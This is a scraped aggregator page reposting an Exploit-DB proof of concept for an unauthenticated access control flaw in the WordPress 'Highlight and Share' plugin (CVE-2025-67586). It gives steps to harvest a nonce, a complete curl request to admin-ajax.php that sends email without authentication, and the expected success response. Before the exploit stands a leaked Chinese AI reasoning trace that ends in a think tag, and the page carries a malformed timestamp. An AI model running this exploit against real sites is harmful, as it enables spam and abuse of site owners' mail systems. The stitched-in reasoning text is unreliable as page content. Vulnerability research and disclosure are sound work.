[webapps] WordPress Plugin 5.2.0 - Broken Access Control
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内,而且不需要用特定的开头。我得先仔细看看这篇文章的内容。 文章标题是关于WordPress插件5.2.0的访问控制漏洞。作者是Zeeshan Haider,漏洞出现在“Highlight and Share”插件里。描述里提到,这个插件有一个未认证的AJAX动作,允许攻击者滥用“Share via Email”功能,而没有适当的权限检查。 攻击者可以复用有效的post nonce来触发邮件分享请求,导致未经授权的邮件发送,比如垃圾邮件或滥用。这个漏洞不需要任何权限,任何人都可以利用。 证明概念部分详细说明了如何获取nonce和利用漏洞的具体步骤。看起来这是一个严重的安全问题,可能影响很多使用该插件的WordPress网站。 用户的需求是总结内容,控制在100字以内。我需要抓住关键点:插件版本、漏洞类型、攻击方式、影响范围和利用条件。 所以总结的时候要包括:WordPress插件版本5.2.0及以下存在漏洞,允许未认证攻击者滥用“Share via Email”功能发送邮件,导致垃圾邮件或滥用。攻击者需要获取有效nonce即可。 </think> WordPress插件5.2.0及以下版本存在访问控制漏洞,允许未认证攻击者滥用"Share via Email"功能发送未经授权的邮件(如垃圾邮件),需获取有效post nonce即可触发。 2026-4-22 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏

# Exploit Title: WordPress Plugin 5.2.0 - Broken Access Control
# Date: 2025-09-20
# Exploit Author: Zeeshan Haider
# Vendor Homepage: https://wordpress.org/plugins/
# Software Link: https://wordpress.org/plugins/highlight-and-share/
# Version: <= 5.2.0 (REQUIRED)
# Tested on: WordPress 6.x, Kali Linux
# CVE: CVE-2025-67586

==> Description
A broken access control vulnerability exists in a WordPress plugin developed by DLX Plugins.
The plugin exposes an unauthenticated AJAX action that allows attackers to abuse the
"Share via Email" functionality without proper permission checks.

An unauthenticated attacker can reuse a valid post nonce to trigger email sharing requests,
leading to unauthorized email sending (email spam / abuse) without user authentication.

==> Privileges Required
None (Unauthenticated)


==> Proof of Concept (PoC)

> Step 1: Pick website with Installed Plugin 

> Step 2: Obtain a Valid Nonce
  1. Open a public post.
  2. Highlight text and click **Share via Email**.
  3. Open Developer Tools → Network → XHR.
  4. Send the email once.
  5. Capture the request containing:
   action=has_email_social_modal
   nonce=<NONCE>
   post_id=<POSTID>

Step 3: Exploit via Unauthenticated Request

> bash cmd: (replace website URL, post URL, and nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php' \
-d 'action=has_email_form_submission' \
-d 'formData[postId]=<POSTID>' \
-d 'formData[permalink]=http://localhost/?p=<POSTID>' \
-d 'formData[nonce]=<NONCE>' \
-d 'formData[toEmail][email protected]' \
-d 'formData[subject]=PoC' \
-d 'formData[shareText]=POC test' \
-d 'formData[emailShareType]=selection' \
--compressed


--> Expected JSON response:

{
"success": true,
"data": {
"errors": false,
"message_title": "This post has been shared!",
"message_body": "You have shared this post with [email protected]",
"message_subject": "[Shared Post] <POST TITLE>",
"message_source_name": "Site Name",
"message_source_email": "[email protected]"
}
}
            

文章来源: https://www.exploit-db.com/exploits/52511
如有侵权请联系:admin#unsafe.sh